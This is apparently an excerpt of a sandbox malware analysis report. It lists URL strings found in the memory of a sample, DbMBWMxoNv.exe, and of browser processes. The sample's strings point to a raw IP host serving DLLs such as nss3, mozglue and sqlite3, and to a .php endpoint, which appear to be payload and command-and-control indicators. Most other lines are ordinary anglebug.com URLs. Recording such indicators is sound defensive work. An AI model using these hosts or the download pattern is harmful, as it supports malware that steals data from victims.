Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/freebl3.dll
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/mozglue.dllg
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/mozglue.dlli
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/msvcp140.dll
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/msvcp140.dll#
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/nss3.dll
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/softokn3.dll
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/sqlite3.dll
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/vcruntime140.dll
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/1d1758bf3d6d1a39/vcruntime140.dll9
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://62.204.41.163/c882d91d1df1bdb3.php
Source: DbMBWMxoNv.exe, 00000000.00000002.1925652686.0000000023550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/c882d91d1df1bdb3.php32
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/c882d91d1df1bdb3.phpamingEBFBKKJECA.exe
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://62.204.41.163/c882d91d1df1bdb3.phpition:
Source: DbMBWMxoNv.exe, 00000000.00000002.1925652686.0000000023550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/c882d91d1df1bdb3.phpor
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163iMqa
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://62.204.41.163pData
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452A
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586rm
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862M
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965X
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970~
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551P
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836H
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836J
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055T
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061)
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371U
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430Y
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
